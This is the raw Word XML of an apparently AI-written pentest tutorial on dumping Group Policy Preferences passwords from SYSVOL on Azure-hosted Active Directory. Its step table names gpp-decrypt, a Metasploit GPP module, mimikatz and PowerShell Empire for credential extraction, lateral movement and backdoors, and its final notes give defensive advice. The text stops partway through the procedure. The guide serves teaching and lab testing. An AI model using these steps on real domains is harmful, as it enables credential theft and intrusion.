    <w:p w14:paraId="413D8401" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insufficient Azure RBAC policies:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> Can lead to compromised accounts with excessive permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFE0296" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lack of logging or alerting:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> Makes detection of GPP exploitation difficult</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB627BA" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="4CBD5648">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1F18DC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Summary Table of Steps and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3854"/>
        <w:gridCol w:w="4436"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="212C3DEC" w14:textId="77777777" w:rsidTr="003955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9875E" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B697B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19AD3A7" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B697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BB6717A" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B697B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command/Tool Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="67C609DC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05017" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>1. Identify SYSVOL Share</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="591D5586" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Enumerate SYSVOL on Domain Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5566E758" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>net view \\DC-IP\SYSVOL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="2E5CDB62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53688" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>2. Find GPP XML files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32B9D1AE" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Locate Groups.xml with encrypted passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DADC49F" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Browse: \\DC-IP\SYSVOL\&lt;domain&gt;\Policies\</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="23079FCD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90D5A" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:lastRenderedPageBreak/>
              <w:t>3. Extract passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62620BDC" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Decrypt encrypted passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="666DF2C7" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>gpp-decrypt.py Groups.xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="233FD4CD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A3756" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>4. Automate with Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F79E377" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Use Metasploit module for GPP extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72182491" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>use auxiliary/gather/credentials/gpp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="0A83D1F3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37557" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>5. Use creds for access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="654985A3" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Use extracted creds for lateral movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5098A1CB" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>rdesktop, winrm, ssh or psexec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="35C2BB8C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A0BA6" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>6. Dump more credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="483DDE3C" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Post-exploitation credential dumping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08837240" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>mimikatz or Invoke-Mimikatz in PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="1A6D3F35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1A97A" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>7. Persist and escalate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76EF68F6" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Create backdoors, escalate privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="599A95AF" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>PowerShell Empire, scheduled tasks, or GPOs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C1E858E" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="16A3E6A5">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F6865B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Final Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318D2EF2" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">GPP credential dumping remains one of the </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>classic and easy AD attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> if old policies have not been cleaned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104EC43F" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Microsoft deprecated the use of GPP passwords after 2014; modern environments should not have vulnerable GPP accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CB5F8E" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Regularly audit and clean SYSVOL for legacy GPP files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1DAD0A" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">In Azure, ensure proper network segmentation, least privilege, and use </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Defender</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> to detect abnormal access patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26844C66" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Enable logging and alerting on SYSVOL access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C73B0F5" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="28D3FD4B">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5880EB" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">If you want, I can also provide a </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>full Azure-centric attack and detection playbook</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> with PowerShell scripts, Metasploit commands, and Azure CLI integration for this workflow. Would you like that?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07569004" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRDefault="00C311DB" w:rsidP="00C311DB"/>
    <w:p w14:paraId="1EDF985C" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRDefault="00C311DB" w:rsidP="00C311DB"/>
    <w:p w14:paraId="02E4D007" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRDefault="00C311DB" w:rsidP="00C311DB"/>
    <w:p w14:paraId="1F0D3E6A" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRDefault="00C311DB" w:rsidP="00C311DB"/>
    <w:p w14:paraId="5A201FE2" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Certainly! Here’s a clear, corrected, and detailed summary on </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>how to pentest Azure Windows/Linux VMs for local accounts, AD accounts, and Microsoft Entra ID accounts via Credential Dumping with Group Policy Preferences (GPP)</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> — covering every step, commands, and relevant Azure VM vulnerabilities, with duplicates removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D73F480" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="67A8E64F">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04778C59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Credential Dumping with Group Policy Preferences (GPP) on Azure VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794FEE7F" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="55984A27">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7D78DF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Why Using GPP to Create User Accounts is Dangerous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A92CADF" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group Policy Preferences (GPP)</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> allow administrators to create local user accounts and set passwords via Group Policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7D87E8" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Passwords for these accounts are stored in </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SYSVOL</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t>, the shared folder replicated across all domain controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D3A048" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>SYSVOL path:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:br/>
        <w:t>\\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies\{GPO-GUID}\Machine\Preferences\Groups\Groups.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB8AB31" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Passwords are encrypted with a </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>known AES key</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">, meaning </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>any authenticated domain user</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> can decrypt them easily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8C6A1E" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Therefore, using GPP to set local admin passwords is insecure and can be exploited to dump credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CFC95B" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="4E6191C2">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="196C7457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lastRenderedPageBreak/>
        <w:t>Lab Setup Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B7DDA2" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain Controller VM:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> Windows Server 2019/2022/2024 running Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BE7A40" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client VMs:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> Windows 10/12 (domain-joined) and Kali Linux for attacker tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E64C065" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Network configured to allow SMB and other relevant protocols for internal communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A359FB0" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="1021A648">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="163BD0DF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Step-by-Step Pentest Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC8BBC1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1. Create a Vulnerable User Account Using GPP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D78C32" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">On the Domain Controller, open </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group Policy Management Console (GPMC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422A0CAA" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Navigate to:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:br/>
        <w:t>Computer Configuration &gt; Preferences &gt; Control Panel Settings &gt; Local Users and Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6234BFEE" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Right-click and select: </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>New &gt; Local User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB3F610" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Create a user (e.g., username: raaz) with a password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF38D2B" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Save and apply the GPO update (gpupdate /force on client machines if needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207B7DCB" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">This process creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Groups.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> file inside SYSVOL containing the encrypted password (cpassword attribute).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C95A00D" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="75F4D3B9">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5329DB41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2. Locate the GPP XML File Containing Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CD1FDD" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>From attacker machine or domain-joined VM, access the SYSVOL share on the Domain Controller:</w:t>
      </w:r>
    </w:p>
